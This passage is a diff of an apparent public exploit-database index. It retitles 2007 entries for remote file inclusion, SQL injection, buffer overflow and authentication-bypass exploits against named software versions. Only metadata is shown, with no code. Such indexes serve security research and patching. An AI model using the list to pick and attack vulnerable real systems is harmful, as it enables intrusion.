-3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 +3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0 3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3882,platforms/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - (Barcodewiz.dll) SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 +3882,platforms/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - (Barcodewiz.dll) Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0 3883,platforms/windows/dos/3883.html,"Barcodewiz ActiveX Control 2.0 - (Barcodewiz.dll) Remote Buffer Overflow (PoC)",2007-05-09,shinnai,windows,dos,0 3884,platforms/php/webapps/3884.txt,"aForum 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 @@ -3549,7 +3550,7 @@ id,file,description,date,author,platform,type,port 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 -3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow Exploit",2007-05-10,Jambalaya,windows,remote,0 +3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow",2007-05-10,Jambalaya,windows,remote,0 3894,platforms/php/webapps/3894.txt,"Original 0.11 - config.inc.php x[1] Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 @@ -3606,14 +3607,14 @@ id,file,description,date,author,platform,type,port 3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 3950,platforms/windows/remote/3950.html,"LeadTools JPEG 2000 - COM Object Remote Stack Overflow",2007-05-18,shinnai,windows,remote,0 -3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow Exploit",2007-05-18,shinnai,windows,remote,0 -3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Buffer Overflow Exploit",2007-05-18,shinnai,windows,remote,0 +3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow",2007-05-18,shinnai,windows,remote,0 +3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Buffer Overflow",2007-05-18,shinnai,windows,remote,0 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 -3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Authentication Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69 +3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Authentication Bypass",2007-05-19,"Ahmed Siddiqui",windows,remote,69 3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - (mp3playlist.php speler) SQL Injection",2007-05-20,NeoMorphS,php,webapps,0 3956,platforms/php/webapps/3956.php,"Alstrasoft e-Friends 4.21 - Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3957,platforms/php/webapps/3957.php,"Alstrasoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 -3958,platforms/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 +3958,platforms/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change",2007-05-20,BlackHawk,php,webapps,0 3959,platforms/php/webapps/3959.php,"Alstrasoft Template Seller Pro 3.25 - Remote Code Execution",2007-05-20,BlackHawk,php,webapps,0 3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant - 'LTRVR14e.dll' Remote File Overwrite",2007-05-21,shinnai,windows,remote,0 @@ -3623,7 +3624,7 @@ id,file,description,date,author,platform,type,port 3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - /AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,windows,dos,0 3966,platforms/windows/remote/3966.php,"Pegasus ImagN - ActiveX Control Remote Buffer Overflow",2007-05-21,rgod,windows,remote,0 3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 - (vc9api.DLL) Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 -3968,platforms/windows/remote/3968.html,"KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote Buffer Overflow Exploit",2007-05-22,"KIM Kee-hong",windows,remote,0 +3968,platforms/windows/remote/3968.html,"KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote Buffer Overflow",2007-05-22,"KIM Kee-hong",windows,remote,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution",2007-05-23,Dj7xpl,php,webapps,0 @@ -3637,10 +3638,10 @@ id,file,description,date,author,platform,type,port 3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)",2007-05-24,shinnai,windows,dos,0 3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection",2007-05-24,Silentz,php,webapps,0 3981,platforms/php/webapps/3981.php,"cpCommerce 1.1.0 - (category.php id_category) SQL Injection",2007-05-24,Kacper,php,webapps,0 -3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow Exploit",2007-05-24,rgod,windows,remote,0 +3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow",2007-05-24,rgod,windows,remote,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0 -3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow Exploit",2007-05-25,rgod,windows,remote,0 -3985,platforms/osx/local/3985.txt,"Apple Mac OS X 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 +3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow",2007-05-25,rgod,windows,remote,0 +3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 3986,platforms/windows/dos/3986.html,"LeadTools Raster - Dialog File_D Object Remote Buffer Overflow",2007-05-25,shinnai,windows,dos,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps,0 @@ -3648,7 +3649,7 @@ id,file,description,date,author,platform,type,port 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - (root) Remote File Inclusion",2007-05-25,"Cold Zero",php,webapps,0 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a - (root_prefix) Remote File Inclusion",2007-05-25,DeltahackingTEAM,php,webapps,0 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b - (pachtofile) Remote File Inclusion",2007-05-25,"Mehmet Ince",php,webapps,0 -3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow Exploit",2007-05-26,rgod,windows,remote,0 +3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,windows,remote,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion",2007-05-26,"ThE TiGeR",php,webapps,0 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - (admin.php site_url) Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 Mod_Rewrite - Remote Overflow (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80 @@ -3667,17 +3668,17 @@ id,file,description,date,author,platform,type,port 4009,platforms/windows/dos/4009.html,"EDraw Office Viewer Component - Denial of Service",2007-05-30,shinnai,windows,dos,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 4011,platforms/windows/dos/4011.html,"LeadTools Raster ISIS Object (LTRIS14e.DLL 14.5.0.44) - Remote Buffer Overflow",2007-05-30,shinnai,windows,dos,0 -4012,platforms/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library - Memory Corruption Exploit",2007-05-30,shinnai,windows,dos,0 -4013,platforms/osx/local/4013.txt,"Apple Mac OS X < 2007-005 - (vpnd) Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 -4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote SEH Overwrite",2007-05-30,h07,windows,remote,0 +4012,platforms/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library - Memory Corruption",2007-05-30,shinnai,windows,dos,0 +4013,platforms/osx/local/4013.txt,"Apple Mac OSX < 2007-005 - (vpnd) Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 +4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0 4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - (MjpegDecoder.dll 2.0.0.13) Remote Exploit",2007-05-31,rgod,windows,remote,0 -4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass Exploit",2007-05-31,Sha0,windows,remote,0 +4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass",2007-05-31,Sha0,windows,remote,0 4017,platforms/windows/dos/4017.cpp,"Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow (PoC)",2007-05-31,n00b,windows,dos,0 4019,platforms/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,php,webapps,0 4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 -4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX - 'sasatl.dll' Remote Buffer Overflow Exploit",2007-06-01,shinnai,windows,remote,0 +4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX - 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,windows,remote,0 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0 -4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - (ISSCamControl.dll 1.0.1.5) Remote Buffer Overflow Exploit",2007-06-02,rgod,windows,remote,0 +4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - (ISSCamControl.dll 1.0.1.5) Remote Buffer Overflow",2007-06-02,rgod,windows,remote,0 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0 4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0 @@ -3702,7 +3703,7 @@ id,file,description,date,author,platform,type,port 4045,platforms/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0 4047,platforms/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - (IPSecDrv.sys) Remote Denial of Service",2007-06-08,mu-b,windows,dos,0 -4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods Exploit",2007-06-08,shinnai,windows,remote,0 +4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods",2007-06-08,shinnai,windows,remote,0 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0 4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - (Ywcvwr.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 @@ -3718,8 +3719,8 @@ id,file,description,date,author,platform,type,port 4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - (low.php topic) SQL Injection",2007-06-12,Silentz,php,webapps,0 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion",2007-06-12,Sp[L]o1T,php,webapps,0 4064,platforms/php/webapps/4064.txt,"XOOPS Module horoscope 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,php,webapps,0 -4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow Exploit",2007-06-13,rgod,windows,remote,0 -4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow Exploit",2007-06-13,rgod,windows,remote,0 +4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow",2007-06-13,rgod,windows,remote,0 +4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow",2007-06-13,rgod,windows,remote,0 4067,platforms/windows/dos/4067.html,"Microsoft Office - MSODataSourceControl COM-object Buffer Overflow (PoC)",2007-06-13,"YAG KOHHA",windows,dos,0 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection - 'modify.php' Remote File Inclusion",2007-06-13,Sp[L]o1T,php,webapps,0 4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - (spaw_root) Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 @@ -3738,7 +3739,7 @@ id,file,description,date,author,platform,type,port 4084,platforms/php/webapps/4084.txt,"XOOPS Module wiwimod 0.4 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 4085,platforms/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 4086,platforms/php/webapps/4086.pl,"LAN Management System (LMS) 1.9.6 - Remote File Inclusion",2007-06-20,Kw3[R]Ln,php,webapps,0 -4087,platforms/linux/remote/4087.c,"BitchX 1.1-final - (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0 +4087,platforms/linux/remote/4087.c,"BitchX 1.1-final - (EXEC) Remote Command Execution",2007-06-21,clarity_,linux,remote,0 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion",2007-06-21,Kw3[R]Ln,php,webapps,0 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 @@ -3756,14 +3757,14 @@ id,file,description,date,author,platform,type,port 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 4104,platforms/php/webapps/4104.txt,"6ALBlog - (newsid) SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - (ShowImage.php name) File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 -4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - (upload.php) Arbitrary File Upload Exploit",2007-06-25,Dj7xpl,php,webapps,0 +4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - (upload.php) Arbitrary File Upload",2007-06-25,Dj7xpl,php,webapps,0 4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 - (news_id) SQL Injection",2007-06-25,Katatafish,php,webapps,0 4108,platforms/php/webapps/4108.txt,"eDocStore - 'doc.php doc_id' SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0 4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0 4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0 -4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 +4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0 4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 @@ -3772,7 +3773,7 @@ id,file,description,date,author,platform,type,port 4120,platforms/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)",2007-06-27,str0ke,windows,dos,0 4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name (PoC)",2007-06-27,ZhenHan.Liu,windows,dos,0 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps,0 -4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control - (AmxVnc.dll 1.0.13.0) Buffer Overflow Exploit",2007-06-28,rgod,windows,remote,0 +4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control - (AmxVnc.dll 1.0.13.0) Buffer Overflow",2007-06-28,rgod,windows,remote,0 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps,0 4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) SQL Injection",2007-06-28,r00t,php,webapps,0 4126,platforms/windows/dos/4126.c,"W3Filer 2.1.3 - Remote Stack Overflow (PoC)",2007-06-29,r0ut3r,windows,dos,0 @@ -3792,24 +3793,24 @@ id,file,description,date,author,platform,type,port 4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - (forum.php MainID) SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 4141,platforms/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,php,webapps,0 4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0 -4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - Buffer Overflow Exploit",2007-07-03,shinnai,windows,remote,0 -4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution Exploit (2)",2007-07-03,BlackHawk,php,webapps,0 -4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution Exploit (1)",2007-07-03,BlackHawk,php,webapps,0 +4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - Buffer Overflow",2007-07-03,shinnai,windows,remote,0 +4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps,0 +4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,php,webapps,0 4146,platforms/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 < 9.2sp1 - Remote Buffer Overflow",2007-07-03,Heretic2,windows,remote,5151 4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - viewforum.php SQL Injection",2007-07-03,Coloss,php,webapps,0 4148,platforms/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 - Remote Stack Overflow (PoC)",2007-07-05,"Mark Litchfield",windows,dos,0 4149,platforms/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 - Remote Heap Overflow (PoC)",2007-07-05,"Mark Litchfield",windows,dos,0 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0 4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0 -4152,platforms/windows/remote/4152.py,"ViRC 2.0 - (JOIN Response) Remote SEH Overwrite",2007-07-06,h07,windows,remote,0 +4152,platforms/windows/remote/4152.py,"ViRC 2.0 - (JOIN Response) Remote Overwrite (SEH)",2007-07-06,h07,windows,remote,0 4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - (categories_type.php cat) SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 -4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote SEH Overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 -4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow Exploit",2007-07-07,nitr0us,windows,remote,0 +4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999 +4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0 4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0 -4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods Exploit",2007-07-07,shinnai,windows,remote,0 +4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0 4161,platforms/php/webapps/4161.txt,"FlashGameScript 1.7 - (user) SQL Injection",2007-07-08,Xenduer77,php,webapps,0 4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80 4163,platforms/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change Exploit",2007-07-08,Dj7xpl,php,webapps,0 @@ -3843,7 +3844,7 @@ id,file,description,date,author,platform,type,port 4191,platforms/php/webapps/4191.txt,"Pictures Rating - 'index.php msgid' SQL Injection",2007-07-18,t0pP8uZz,php,webapps,0 4192,platforms/php/webapps/4192.htm,"Vivvo CMS 3.4 - 'index.php' Blind SQL Injection",2007-07-18,ajann,php,webapps,0 4193,platforms/php/webapps/4193.txt,"QuickEStore 8.2 - (insertorder.cfm) SQL Injection",2007-07-18,meoconx,php,webapps,0 -4194,platforms/php/webapps/4194.txt,"Joomla Component Expose RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0 +4194,platforms/php/webapps/4194.txt,"Joomla Component Expose RC35 - Arbitrary File Upload",2007-07-18,"Cold Zero",php,webapps,0 4195,platforms/php/webapps/4195.txt,"BBS E-Market - 'postscript.php p_mode' Remote File Inclusion",2007-07-18,mozi,php,webapps,0 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion",2007-07-18,bd0rk,php,webapps,0 @@ -3859,8 +3860,8 @@ id,file,description,date,author,platform,type,port 4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport ActiveX - (actrpt2.dll 2.5) Insecure Method",2007-07-21,shinnai,windows,remote,0 4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - (displaycat catid) SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 -4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass Exploit",2007-07-21,s4mi,php,webapps,0 -4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 Beta 2 - (search) Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 +4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,php,webapps,0 +4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 4213,platforms/php/webapps/4213.txt,"bwired - 'index.php newsID' SQL Injection",2007-07-22,g00ns,php,webapps,0 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote Buffer Overflow",2007-07-23,shinnai,windows,remote,0 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0 @@ -3868,7 +3869,7 @@ id,file,description,date,author,platform,type,port 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow",2007-07-24,"Jared DeMott",windows,remote,0 4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. Safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 4219,platforms/php/webapps/4219.txt,"Confixx Pro 3.3.1 - (saveserver.php) Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps,0 -4220,platforms/php/webapps/4220.pl,"Entertainment CMS - (Local Inclusion) Remote Command Execution Exploit",2007-07-24,Kw3[R]Ln,php,webapps,0 +4220,platforms/php/webapps/4220.pl,"Entertainment CMS - (Local Inclusion) Remote Command Execution",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps,0 4222,platforms/windows/remote/4222.c,"Microsoft Windows RSH daemon 1.7 - Remote Buffer Overflow",2007-07-24,"Joey Mengele",windows,remote,514 4223,platforms/windows/remote/4223.pl,"IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow",2007-07-25,ZhenHan.Liu,windows,remote,143 @@ -3883,9 +3884,9 @@ 